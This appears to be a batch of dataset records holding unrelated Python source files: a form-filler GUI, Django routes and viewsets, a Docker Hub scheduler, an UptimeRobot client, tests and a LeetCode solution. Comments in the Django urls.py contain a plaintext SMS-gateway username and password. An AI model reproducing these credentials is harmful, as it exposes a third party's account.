isinstance(p[1], bool):\n if not isinstance(p[3], bool):\n raise ValueError(f\"{p[1]} is bool but {p[3]} is not\")\n elif isinstance(p[1], datetime):\n if not isinstance(p[3], datetime):\n raise ValueError(f\"{p[1]} is datetime but {p[3]} is not\")\n\n\nclass Filter:\n \"\"\"filter for telegram download\"\"\"\n\n def __init__(self):\n self.filter = BaseFilter()\n\n def set_meta_data(self, meta_data: MetaData):\n \"\"\"Set meta data for filter\"\"\"\n self.filter.reset()\n self.filter.names = meta_data.data()\n\n def set_debug(self, debug: bool):\n \"\"\"Set Filter Debug Model\"\"\"\n self.filter.debug = debug\n\n def exec(self, filter_str: str) -> bool:\n \"\"\"Exec filter str\"\"\"\n\n if self.filter.names:\n res = self.filter.exec(filter_str)\n if isinstance(res, bool):\n return res\n return False\n raise ValueError(\"meta data cannot be empty!\")\n\n def check_filter(self, filter_str: str) -> Tuple[bool, Optional[str]]:\n \"\"\"check filter str\"\"\"\n try:\n return not self.exec(filter_str) is None, None\n except Exception as e:\n return False, str(e)\n","repo_name":"tangyoha/telegram_media_downloader","sub_path":"module/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","stars":1043,"dataset":"github-code","pt":"53"} +{"seq_id":"16453389014","text":"import unittest\n\nfrom pig_latin import piglatin_tranlator as translate\n\n\nclass TestPigLatin(unittest.TestCase):\n\n def test_word_starts_with_consonant(self):\n pig = translate('pig')\n banana = translate('banana')\n\n self.assertEqual(pig, 'igpay')\n self.assertEqual(banana, 'ananabay')\n\n def test_word_begins_with_consonnant_cluster(self):\n smile = translate('smile')\n glove = translate('glove')\n string = translate('string')\n self.assertEqual(smile, 'ilesmay')\n self.assertEqual(glove, 'oveglay')\n self.assertEqual(string, 'ingstray')\n\n def test_word_begins_with_voye(self):\n eat = translate('eat')\n omelet = translate('omelet')\n self.assertEqual(eat, 'eatay')\n self.assertEqual(omelet, 'omeletay')\n \n def test_full_sentence(self):\n result = translate('Hello, my name is Alice.')\n self.assertEqual(result, 'Ellohay, ymay amenay isay Aliceay.')\n \n def test_non_string_input(self):\n result = translate(392837263)\n self.assertEqual(result, 'The phrase to translate should be a string')\n\n def test_empty_string(self):\n result = translate('')\n self.assertEqual(result, '')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"thiernomoudou/es_challenge","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1316931128","text":"#! python3\n\n\n\n\n# from AF_form_910 import Write_AF_form_910\nimport tkinter\nfrom tkinter import ttk\nimport os\nimport tkinter as tk\nfrom tkinter import font as tkFont\nimport extractExcelFileInfo.getExcelFileInfo\nimport AF_form_910.AF_form_910\nimport AF_form_911.AF_form_911\nimport Form_4.Form_4\n\ncurrentFilePath = os.path.dirname(os.path.abspath(__file__))\nreferencePath = os.path.join(currentFilePath, 'reference')\nexcelFilePath = os.path.join(referencePath, 'ALPHA_ROSTER_FIELDS.xlsm')\nexcelFileInfo = extractExcelFileInfo.getExcelFileInfo.getExcelFileInfo(excelFilePath)\n# form910FolderPath = os.path.join(currentFilePath, 'AF_form_910')\n# form910Path = os.path.join(form910FolderPath, 'AF_form_910.pdf')\n\n \nNORM_FONT = (\"Helvetica\", 10)\nBIG_FONT = (\"Helvetica\", 30)\n# helv36 = tkFont.Font(family='Helvetica', size=36)\ndef create_GUI():\n # root = tkinter.Tk()\n root = tk.Tk()\n root.geometry('450x250')\n root.title(\"Automated Form Filler\")\n root.config(bg='#FF2400')\n root.state('zoomed')\n return root\nroot = create_GUI()\n \n\ndef create_left_frame(root):\n leftSideFrameVariable = tkinter.Frame(root)\n leftSideFrameVariable.grid(row = 0, column = 0)\n # leftSideFrameVariable.config(bg='#F2B90C')\n return leftSideFrameVariable\nleftSideFrameVariable = create_left_frame(root)\n\ndef create_right_frame(root):\n rightSideFrameVariable = tkinter.Frame(root)\n rightSideFrameVariable.grid(row = 0, column = 1)\n scrollbarVariable = tkinter.Scrollbar(\n rightSideFrameVariable,\n orient = tkinter.VERTICAL)\n listBoxVariable = tkinter.Listbox(\n rightSideFrameVariable,\n width = 50,\n yscrollcommand = scrollbarVariable.set,\n selectmode = tkinter.MULTIPLE) #tkinter.EXTENDED)\n scrollbarVariable.config(command = listBoxVariable.yview)\n scrollbarVariable.pack(side = tkinter.RIGHT, fill = tkinter.Y)\n listBoxVariable.pack()\n return listBoxVariable\n# create_right_frame(root)\nlistBoxVariable = create_right_frame(root)\nbuttonVariable = tkinter.IntVar()\nforms = ('Form 910 (AB - TSgt EPR)', 'Form 911 (MSgt - SMSgt EPR)', 'Form 4 (Reenlistment)')\noptionVar = tkinter.StringVar()\nranks = ['AB', 'AIC', 'SRA', 'SSG', 'TSG', 'MSG', 'SMSgt']\nnameList = []\nrankList = []\n\n\ndef determine_program_to_run():\n optionMenuValue = optionVar.get()\n if optionMenuValue == 'Form 910 (AB - TSgt EPR)':\n programToStart = 'AF_form_910'\n elif optionMenuValue == 'Form 911 (MSgt - SMSgt EPR)':\n programToStart = 'AF_form_911'\n elif optionMenuValue == 'Form 4 (Reenlistment)':\n programToStart = 'Form_4_reenlistment'\n else:\n programToStart = ''\n return programToStart\n\n\n\n\n\nformOptionMenu = ttk.OptionMenu(\n leftSideFrameVariable, \n optionVar, \n 'Choose form', \n *forms)\nbuttonLabel = tkinter.Label(\n leftSideFrameVariable,\n text = 'Choose:')\nbutton1 = tkinter.Radiobutton(\n leftSideFrameVariable,\n text = 'By Rank',\n variable = buttonVariable,\n value = 1,\n justify='left',\n command=lambda: put_either_rank_or_names_into_listbox(button1))\nbutton2 = tkinter.Radiobutton(\n leftSideFrameVariable,\n text = 'By Name',\n variable = buttonVariable,\n value = 2,\n justify='left',\n command=lambda: put_either_rank_or_names_into_listbox(button2))\nrunButton = tkinter.Button(\n leftSideFrameVariable,\n text = 'Run Program',\n command = lambda: runProgram(processingLabel, excelFileInfo, referencePath))\nprocessingLabel = tkinter.Label(\n leftSideFrameVariable,\n text = '')\n\ndef left_side_button_placement(formOptionMenu, button1, button2, runButton, processingLabel):\n formOptionMenu.grid(row = 0, column = 0, padx = 40, pady = 10)\n button1.grid(row = 3, column = 0)\n button2.grid(row = 4, column = 0)\n runButton.grid(row = 5, column = 0, padx = 100, pady = 10)\n processingLabel.grid(row = 6, column = 0)\nleft_side_button_placement(formOptionMenu, button1, button2, runButton, processingLabel)\n\n\n\ndef runProgram(processingLabel, excelFileInfo, referencePath): \n programToStart = determine_program_to_run()\n rankOrName = choose_radio_button()\n selectedItems = []\n excelColumnToSearch = 0\n for i in listBoxVariable.curselection():\n selectedItem = listBoxVariable.get(i)\n selectedItems.append(selectedItem)\n\n if rankOrName == 'rank':\n excelColumnToSearch = 3\n elif rankOrName == 'name':\n excelColumnToSearch = 1\n\n if programToStart == '':\n textDisplayed = 'You must select a form'\n else:\n if buttonVariable.get() != 1 or 2:\n textDisplayed = 'You must make at least 1 choice of rank or name'\n else:\n if selectedItems == []:\n textDisplayed = (\"Make at least 1 %s choice\" % (rankOrName))\n processingLabel.configure(text = textDisplayed)\n if programToStart != '' and rankOrName != '' and selectedItems != []:\n if programToStart == 'AF_form_910':\n AF_form_910.AF_form_910.Write_AF_form_910(excelFileInfo, referencePath, selectedItems, excelColumnToSearch)\n elif programToStart == 'AF_form_911':\n AF_form_911.AF_form_911.Write_AF_form_911(excelFileInfo, referencePath, selectedItems, excelColumnToSearch) \n elif programToStart == 'Form_4_reenlistment':\n Form_4.Form_4.Write_Form_4(excelFileInfo, referencePath, selectedItems, excelColumnToSearch) \n\n# This method places either the ranks or the names into the field once either radio button is pressed. Called as an argument by the radio buttons\ndef put_either_rank_or_names_into_listbox(buttonPressed):\n listBoxVariable.delete(0, tkinter.END)\n\n if buttonPressed == button1:\n \n for j in range(len(ranks)):\n listBoxVariable.insert(tkinter.END, ranks[j])\n \n elif buttonPressed == button2:\n names = [] #this needs to be its own method\n i = 2\n while str((excelFileInfo.cell(row = i, column = 1)).value) != '':\n currentName = str((excelFileInfo.cell(row = i, column = 1)).value)\n if currentName == 'None':\n break\n else:\n names.append(currentName)\n i +=1\n names.sort()\n # extractExcelFileInfo.getExcelFileInfo.getExcelFileInfo()\n for i in range(len(names)):\n listBoxVariable.insert(tkinter.END, names[i])\ndef choose_radio_button():\n if buttonVariable.get() == 1:\n rankOrName = 'rank'\n textDisplayed = rankOrName\n elif buttonVariable.get() == 2:\n rankOrName = 'name' \n textDisplayed = rankOrName \n else:\n textDisplayed = 'You must choose either by rank or by name'\n rankOrName = ''\n processingLabel.configure(text = textDisplayed)\n return rankOrName\n\n# def error_message_popup(msg):\n# popup = tk.Tk()\n# popup.wm_title(\"!\")\n# label = ttk.Label(popup, text=msg, font=NORM_FONT)\n# label.pack(side=\"top\", fill=\"x\", pady=100, padx=200)\n# B1 = ttk.Button(popup, text=\"Okay\", command = popup.destroy)\n# B1.pack()\n# popup.mainloop()\n\nroot.mainloop()\n","repo_name":"morganmorris1953/Form_Filler","sub_path":"FormFiller/FormFiller.py","file_name":"FormFiller.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18229117191","text":"from typing import List\n\n\nclass Solution:\n def largestRectangleArea(self, heights: List[int]) -> int:\n\n if not heights:\n return 0\n\n number_of_bars = len(heights)\n\n output = []\n\n for i in range(number_of_bars):\n current_bar_height = heights[i]\n counter = 1\n for j in range(i, number_of_bars-1):\n if current_bar_height <= heights[j + 1]:\n counter += 1\n else:\n break\n for k in range(i, 0, -1):\n if current_bar_height <= heights[k - 1]:\n counter += 1\n else:\n break\n\n output.append(current_bar_height * counter)\n\n return max(output) if output and (max(output) > max(heights)) else max(heights)\n\nheights = [5,5,1,7,1,1,5,2,7,6]\ns= Solution()\nprint(s.largestRectangleArea(heights))","repo_name":"jayati-naik/Leetcode-Recursion-II","sub_path":"LargestRectangle.py","file_name":"LargestRectangle.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4057013593","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom .views import *\n\n# otpmsg=\"http://panel.adcomsolution.in/http-api.php?username=varun&password=varun123&senderid=LUCSON&route=1&number=<str:pk>&message=<str:pk>\"\n# booking_otp=\"http://panel.adcomsolution.in/http-api.php?username=varun&password=varun123&senderid=LUCSON&route=1&number=<str:pk>&message=\"\nurlpatterns = [\n path('User/Register/', user_register, name=\"user_register\"),\n path('User/Login/', user_Login, name='UserLogin'),\n path('User/SocialRegister/', user_social_Register, name='user_social_Register'),\n path('User/SocialLogin/', user_social_Login, name='user_social_Login'),\n path('User/Edit_Profile/', user_edit_profile, name=\"user_edit_profile\"),\n path('User/ProfileView/', user_detail_view, name=\"user_detail_view\"),\n path('User/Register_otp/', registerOTP, name=\"registerOTP\"),\n path('User/forgot_password/', user_forgot_password, name=\"forgot_password\"),\n path('User/Status/', user_status_change, name=\"user_status_change\"),\n\n path('User/ChangePassword/', user_change_password, name=\"user_change_password\"),\n path('UserWallet/AddMoney/', user_wallet_add_money, name=\"uw_add_money\"),\n path('UserWallet/CutMoney/', user_wallet_cut_money, name=\"uw_cut_money\"),\n path('UserWallet/Detail/', userwallet_detail_view, name=\"uw_detail\"),\n path('UserWallet/transaction_history/', userwallet_transaction_history,\n name=\"userwallet_transaction_history\"),\n\n path('Vehicle/View/', vehicle_details_view, name=\"v_view\"),\n path('Vehicles/View/', vehicles_view, name=\"vs_view\"),\n path('Vehicle/Update/', vehicle_details_update, name=\"v_update\"),\n path('Vehicle/Add/', vehicle_details_added, name=\"v_create\"),\n path('Vehicle/Delete/', vehicle_Delete, name=\"v_delete\"),\n path('Refferal_Vehicle/Add/', refferal_vehicle_details_add, name=\"refferal_vehicle_details_add\"),\n path('Refferal_Vehicle/msg_confirm/', refferal_vehicle_msg, name=\"refferal_vehicle_msg\"),\n\n path('Vehicle_owner_vehicle/display/', vehicle_owner_vehicle_display,\n name=\"vehicle_owner_vehicle_display\"),\n path('Refferal_user_vehicle/display/', refferal_user_vehicle_display,\n name=\"refferal_user_vehicle_display\"),\n\n path('User_view/', pz_user_view, name=\"pz_user_view\"),\n path('User_create/', pz_user_create, name=\"pz_user_create\"),\n path('User_edit/', pz_user_edit, name=\"pz_user_edit\"),\n path('User_update/', pz_user_update, name=\"pz_user_update\"),\n\n path('user_activity/', user_activity, name=\"user_activity\"),\n\n path('userwallet_create_form/', userwallet_create_form, name=\"userwallet_create_form\"),\n path('userwallet_view_form/', userwallet_view_form, name=\"userwallet_view_form\"),\n path('userwallet_form_edit/', userwallet_form_edit, name=\"userwallet_form_edit\"),\n path('userwallet_update_form/', userwallet_update_form, name=\"userwallet_update_form\"),\n path('userwallet_delete_form/', userwallet_delete_form, name=\"userwallet_delete_form\"),\n path('userwallet_add_bonus_money/', userWallet_bonus_add, name=\"userWallet_bonus_add\"),\n\n path('UserVehicle_view/', pz_uservehicle_view, name=\"pz_uservehicle_view\"),\n path('UserVehicle_create/', pz_uservehicle_create, name=\"pz_uservehicle_create\"),\n path('UserVehicle_edit/', pz_uservehicle_edit, name=\"pz_uservehicle_edit\"),\n path('UserVehicle_update/', pz_uservehicle_update, name=\"pz_uservehicle_update\"),\n path('UserVehicle_delete/', pz_uservehicle_delete, name=\"pz_uservehicle_delete\"),\n path('user_view1/', user_view1, name=\"user_view1\"),\n path('vehicle_view1/', vehicle_view1, name=\"vehicle_view1\"),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"deegosai/parkingzone","sub_path":"User/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20750352039","text":"import re\nimport subprocess\nfrom abc import ABC, abstractmethod\nfrom typing import Any\n\n__all__ = [\n \"ComputationBackend\",\n \"CPUBackend\",\n \"CUDABackend\",\n \"detect_computation_backend\",\n]\n\n\nclass ComputationBackend(ABC):\n @property\n @abstractmethod\n def local(self) -> str:\n ...\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, ComputationBackend):\n return self.local == other.local\n elif isinstance(other, str):\n return self.local == other\n else:\n return False\n\n def __hash__(self) -> int:\n return hash(self.local)\n\n def __repr__(self) -> str:\n return self.local\n\n @classmethod\n def from_str(cls, string: str) -> \"ComputationBackend\":\n string = string.lower()\n try:\n if string == \"cpu\":\n return CPUBackend()\n elif string.startswith(\"cu\"):\n match = re.match(r\"^cu(da)?(?P<version>[\\d.]+)$\", string)\n if match is None:\n raise Exception\n\n version = match.group(\"version\")\n if \".\" in version:\n major, minor = version.split(\".\")\n else:\n major = version[:-1]\n minor = version[-1]\n\n return CUDABackend(int(major), int(minor))\n\n except Exception:\n pass\n\n raise RuntimeError(f\"Unable to parse {string} into a computation backend\")\n\n\nclass CPUBackend(ComputationBackend):\n @property\n def local(self) -> str:\n return \"cpu\"\n\n\nclass CUDABackend(ComputationBackend):\n def __init__(self, major: int, minor: int) -> None:\n self.major = major\n self.minor = minor\n\n @property\n def local(self) -> str:\n return f\"cu{self.major}{self.minor}\"\n\n\nNVCC_RELEASE_PATTERN = re.compile(r\"release (?P<major>\\d+)[.](?P<minor>\\d+)\")\n\n\ndef detect_computation_backend() -> ComputationBackend:\n fallback = CPUBackend()\n try:\n output = (\n subprocess.check_output(\"nvcc --version\", shell=True)\n .decode(\"utf-8\")\n .strip()\n )\n match = NVCC_RELEASE_PATTERN.findall(output)\n if not match:\n return fallback\n\n major, minor = match[0]\n return CUDABackend(int(major), int(minor))\n except subprocess.CalledProcessError:\n return fallback\n","repo_name":"pmeier/pytorch_wheel_installer","sub_path":"pytorch_wheel_installer/computation_backend.py","file_name":"computation_backend.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"55358896","text":"import os.path\nimport time\nfrom datetime import datetime\n\nimport requests\nfrom celery.utils.log import get_task_logger\n\nfrom kpiit.providers import BaseProvider\n\nlogger = get_task_logger(__name__)\n\n\nclass UptimeRobotProvider(BaseProvider):\n \"\"\"Uptime Robot provider.\"\"\"\n\n def __init__(self, url, api_key, monitor_name):\n \"\"\"Uptime Robot provider initialization.\"\"\"\n if not url:\n raise ValueError(\"url can't be empty\")\n if not monitor_name:\n raise ValueError(\"monitor_name can't be empty\")\n\n self.url = url\n self.api_key = api_key\n self.monitor_name = monitor_name\n self.uptime_ratio = None\n self.response_time = None\n\n def collect(self):\n \"\"\"Get data from Uptime Robot.\"\"\"\n if not self.api_key:\n # Send dummy values if no API key is specified\n logger.warning(\n 'no API key specified for Uptime provider: {}'.format(\n self.monitor_name\n )\n )\n return {\n 'response_time': None,\n 'uptime_ratio': None\n }\n\n params = dict(\n custom_uptime_ratios=1,\n response_times=1\n )\n resp = self.send('getMonitors', **params)\n if resp['stat'] == 'fail':\n raise ValueError('failed to download monitor data')\n return self._update_data(resp)\n\n def _update_data(self, resp):\n \"\"\"Update uptime and response time attributes.\"\"\"\n for monitor in resp['monitors']:\n name = monitor['friendly_name']\n if name == self.monitor_name:\n self.uptime_ratio = monitor['custom_uptime_ratio']\n self.response_time = monitor['average_response_time']\n break\n return {\n 'response_time': self.response_time,\n 'uptime_ratio': self.uptime_ratio\n }\n\n def send(self, action, **kwargs):\n \"\"\"Send request to UptimeRobot API and return the JSON object.\"\"\"\n url = os.path.join(self.url, action)\n kwargs['api_key'] = self.api_key\n if 'format' not in kwargs:\n kwargs['format'] = 'json'\n if 'logs' not in kwargs:\n kwargs['logs'] = 1\n pairs = ['{}={}'.format(*item) for item in kwargs.items()]\n payload = '&'.join(pairs)\n headers = {\n 'content-type': 'application/x-www-form-urlencoded',\n 'cache-control': 'no-cache'\n }\n resp = requests.request(\n 'POST',\n url,\n data=payload,\n headers=headers\n )\n resp.raise_for_status()\n return resp.json()\n","repo_name":"inveniosoftware-contrib/kpiit","sub_path":"kpiit/providers/uptime_robot.py","file_name":"uptime_robot.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71101755689","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\nimport json\nimport datetime\nfrom crawler import DockerCrawler\nimport time\nimport requests\n\nSCHEDULE_ENDPOINT = '/schedule'\nCRAWL_DOCKERHUB_FREQUENCY_SECONDS = int(os.getenv(\"CRAWL_DOCKERHUB_FREQUENCY_SECONDS\", default=60))\nLOG_FOLDER = \"scheduler_logs\"\nLOG_FILE = 'scheduler.log'\nos.makedirs(LOG_FOLDER, exist_ok=True)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(threadName)s - %(levelname)s - %(message)s',\n handlers=[\n TimedRotatingFileHandler(\"%s/%s\" % (LOG_FOLDER, LOG_FILE), when=\"midnight\", interval=1), \n logging.StreamHandler()\n ])\n\nFRONTEND_ENDPOINT = os.getenv(\"FRONTEND_SERVER\")\nif not FRONTEND_ENDPOINT:\n raise ValueError(\"Please specify FRONTEND_SERVER environment variable!\")\nelse:\n FRONTEND_ENDPOINT = \"http://\" + FRONTEND_ENDPOINT + SCHEDULE_ENDPOINT\n\n\nclass Scheduler:\n\n def __init__(self):\n '''Initialize and retrieve all images from frontend server (controller)\n After that, the cached images are used for scheduling. \n In case a new image is added, the scheduler needs to be restarted by the controller!\n '''\n json.JSONEncoder.default = lambda self,obj: (obj.isoformat() if isinstance(obj, datetime.datetime) else None)\n self.schedule = {}\n try:\n self.schedule, _ = self.reguest_all_images()\n except requests.exceptions.ConnectionError as e:\n logging.error(\"Make sure that server you are trying to connect is up. %s\" % e)\n logging.error(\"Please start the scheduler again when the frontend server is up!\")\n logging.error(\"You can do this by executing 'docker restart scheduler'.\")\n exit(1)\n self.last_updated_images = {} #snapshot\n self.crawler = DockerCrawler()\n\n def reguest_all_images(self):\n '''Request all the images from the frontend server\n '''\n response = requests.get(FRONTEND_ENDPOINT)\n logging.info(response.status_code)\n schedule = response.json()\n logging.info(\"Requested image list is: %s \" % schedule)\n return schedule, response.status_code\n\n def run(self):\n self.updated_status = False\n for image, status in self.schedule.items():\n old_timestamp = self.last_updated_images.get(image)\n new_timestamp = self.crawler.get_last_update_timestamp(image)\n if old_timestamp == new_timestamp:\n # Image not updated\n logging.debug('Image has not been updated: %s', image)\n self.schedule[image] = 'old'\n elif old_timestamp is None and status == 'old':\n # old timestamp missing\n # do nothing, only save timestamp as current one\n logging.info(\"all images are same\")\n self.last_updated_images[image] = new_timestamp\n self.updated_status = True\n else:\n # Image updated\n logging.info('New tag for image %s detected at %s', image, new_timestamp)\n self.last_updated_images[image] = new_timestamp\n self.updated_status = True\n self.schedule[image] = 'updated'\n logging.info(\"All team images checked\")\n\n\ndef post_schedule(payload):\n headers = {'Content-type': 'application/json'}\n try:\n response = requests.post(FRONTEND_ENDPOINT, json = payload, headers=headers)\n logging.info('Finished sending image schedule. Response: %s' % response.status_code)\n if (response.status_code == 201):\n return {'status': 'success', 'message': 'updated'}\n if (response.status_code == 404):\n return {'message': 'Something went wrong!'}\n except requests.exceptions.ConnectionError as e:\n logging.error(\"Please specify Frontend server address! %s\", e)\n exit(1)\n return response.status_code\n\n\nif __name__ == '__main__':\n logging.info(\"Waiting for DB server to start\")\n logging.info(\"Waiting for the backend server to start\")\n backoff = int(os.getenv(\"SCHEDULER_STARTUP_BACKOFF\", default=30))\n frontend_backoff = int(os.getenv(\"FRONTEND_STARTUP_BACKOFF\", default=0))\n if backoff <= frontend_backoff:\n logging.debug(\"Sheduler should start after the frontend server. Adding small backoff\")\n backoff = frontend_backoff + 15\n time.sleep(backoff)\n\n scheduler = Scheduler()\n while(True):\n scheduler.run()\n updated_images = {}\n if scheduler.updated_status:\n for image, status in scheduler.schedule.items():\n if str(status) == 'updated':\n updated_images[image] = scheduler.last_updated_images[image]\n\n if updated_images:\n logging.info(\"Scheduler sending updated images: %s\", updated_images)\n post_schedule(updated_images)\n scheduler.updated_status = False\n else:\n logging.info(\"Images weren't updated yet. Idling...\")\n\n time.sleep(CRAWL_DOCKERHUB_FREQUENCY_SECONDS)\n","repo_name":"Hannajd/debs-2020-challenge-platform","sub_path":"scheduler/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11917726165","text":"#!/usr/bin/env python\n\nfrom datetime import datetime, timedelta\nfrom urllib import urlencode\nfrom urllib2 import urlopen\nimport json\nimport logging\n\nfrom django.utils.timezone import now\n\nfrom windstream.models import *\n\n# Span of hours to retrieve per query (maximum).\nHOURS_PER_QUERY = 4\n\nlogger = logging.getLogger('ebwind.retrieve')\n\ndef open_url(mill, start_timestamp):\n \"\"\"Open the url for a given mill.\n\n Will grab HOURS_PER_QUERY samples beginning at the last retrieved time.\n\n \"\"\"\n url = 'http://ds.windstream-inc.com/WSData/api/performancedata.json'\n params = { 'installid': mill.install_id,\n 'timezone': 'utc',\n 'start': start_timestamp.strftime(\"%Y-%m-%d %H:%M\"),\n 'span': \"{}hours\".format(HOURS_PER_QUERY)\n\n }\n full_url = \"{}?{}\".format(url, urlencode(params))\n return urlopen(full_url)\n\ndef retrieve_data(mill):\n \"\"\"Retrieve data saved since the most recent retrieval.\n\n If no data have been retrieved, go back to the earliest-known time at which data were\n gathered and retrieve everything.\n\n \"\"\"\n start_timestamp = None\n try:\n latest_sample = TurboMillSample.objects.order_by('-time_stamp')[0]\n logger.debug(\"Latest sample at %s\", latest_sample)\n start_timestamp = latest_sample.time_stamp\n except TurboMillSample.DoesNotExist:\n logger.debug(\"No sample for %s\", mill)\n # N.B., earliest known date (for Matthews Community Center) is 2012-11-29.\n start_timestamp = datetime(2012, 11, 29, 0, 0, 0)\n\n num_added = num_skipped = 0\n stop_timestamp = now()\n sixty_minutes = timedelta(hours=HOURS_PER_QUERY)\n logger.info(\"START %s\", start_timestamp)\n logger.info(\"STOP %s\", stop_timestamp)\n while start_timestamp < stop_timestamp:\n # The JSON feed prefixes thedata with a Unicode Byte Order Mark (BOM). This\n # decoding removes the mark.\n logger.info(\"Retrieving %s from %s\", mill, start_timestamp)\n raw = open_url(mill, start_timestamp).read().decode('utf-8-sig')\n data = json.loads(raw)\n\n for datum in data:\n try:\n sample = TurboMillSample.objects.get(location=mill, time_stamp=datum['TimeStamp'])\n logger.debug(\"ALREADY HAVE %s at %s\", sample.location, sample.time_stamp)\n num_skipped += 1\n except TurboMillSample.DoesNotExist:\n logger.debug(\"ADDING %s at %s\", mill, datum['TimeStamp'])\n num_added += 1\n TurboMillSample.objects.create(location=mill,\n time_stamp = datum['TimeStamp'],\n joules = datum['Joules'],\n watts_avg = datum['WattsAvg'],\n volts_avg = datum['VoltsAvg'],\n volts_peak = datum['VoltsPeak'],\n volts_min = datum['VoltsMin'],\n amps_avg = datum['AmpsAvg'],\n amps_peak = datum['AmpsPeak'],\n speed_avg = datum['SpeedAvg'] or 0,\n speed_peak = datum['SpeedPeak'] or 0,\n dir_mag = datum['DirMag'],\n dir_ang = datum['DirAng'],\n dir_cos = datum['DirCos'])\n start_timestamp += sixty_minutes\n\n logger.info(\"ADDED %d, SKIPPED %d\", num_added, num_skipped)\n\ndef retrieve():\n for mill in TurboMillLocation.objects.all():\n retrieve_data(mill)\n\nif __name__ == '__main__':\n retrieve()\n","repo_name":"nurkkala/ebwind","sub_path":"retrieve-data.py","file_name":"retrieve-data.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20762301013","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets, filters, permissions, authentication, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.pagination import PageNumberPagination\n\n\nfrom .models import Post, Comment\nfrom .serializers import PostSerializer, CommentSerializer\nfrom .permissions import IsOwner\n# Create your views here.\n\n\nclass PostViewSet(viewsets.ModelViewSet):\n \"\"\"\n A simple ViewSet for listing or retrieving users.\n \"\"\"\n\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostSerializer\n pagination_class = PageNumberPagination\n filter_backends = [filters.SearchFilter]\n search_fields = ['title', 'date_pub']\n\n def get_queryset(self, pk=None):\n # TODO: refactor this method as we are using filter API\n # filter query with date_pub if provided\n # user can only get it's post\n if self.request.resolver_match.kwargs == {}:\n print(\">>>>\", 'first scope')\n date_published = self.request.query_params.get(\n 'date_published', None)\n if date_published is not None:\n queryset = Post.objects.filter(\n owner=self.request.user, date_pub=date_published)\n else:\n queryset = Post.objects.filter(owner=self.request.user)\n else:\n pk = self.request.resolver_match.kwargs['pk']\n date_published = self.request.query_params.get(\n 'date_published', None)\n if date_published is not None:\n queryset = Post.objects.filter(\n owner=self.request.user, date_pub=date_published, pk=pk)\n else:\n queryset = Post.objects.filter(owner=self.request.user, pk=pk)\n\n return queryset\n\n def list(self, request):\n print(\"List excuted\")\n queryset = self.filter_queryset(self.get_queryset())\n # Paginate the queryset\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n serializer = PostSerializer(page, many=True)\n\n # Create a dictionary with count, next, and previous URLs\n response = {\n 'count': paginator.page.paginator.count,\n 'next': paginator.get_next_link(),\n 'previous': paginator.get_previous_link(),\n 'results': serializer.data\n }\n\n return Response(response)\n\n def retrieve(self, request, pk=None):\n queryset = self.get_queryset(pk=pk)\n serializer = PostSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def create(self, request, *args, **kwargs):\n serializer = PostSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def update(self, request, *args, **kwargs):\n print(\"Update excuted\")\n instance = self.get_object()\n serializer = PostSerializer(instance, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n print(\"Delete Request\", instance)\n instance.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n\n pagination_class = PageNumberPagination\n serializer_class = CommentSerializer\n\n def authorization(self, request, instance):\n # authorization\n if instance.owner.id == request.user.id:\n return True\n else:\n return False\n\n def get_queryset(self):\n queryset = Comment.objects.filter(\n post=self.request.resolver_match.kwargs['post_id'])\n return queryset\n\n # list all comments of a specific post\n def list(self, request, *args, **kwargs):\n print(\"comments\\list\")\n queryset = self.get_queryset()\n pageinator = self.pagination_class()\n page = pageinator.paginate_queryset(queryset=queryset, request=request)\n serializer = CommentSerializer(page, many=True)\n\n # Create a dictionary with count, next, and previous URLs\n response = {\n 'count': pageinator.page.paginator.count,\n 'next': pageinator.get_next_link(),\n 'previous': pageinator.get_previous_link(),\n 'results': serializer.data\n }\n\n return Response(response)\n\n def retrieve(self, request, *args, **kwargs):\n # get spcefic comment\n # url /comments/comment_id\n print('comments/retrive')\n comment_id = self.request.resolver_match.kwargs['comment_id']\n\n queryset = get_object_or_404(Comment, id=comment_id)\n serializer = self.serializer_class(queryset)\n\n return Response(serializer.data)\n\n def create(self, request, *args, **kwargs):\n print('Comments/create')\n seralizer = 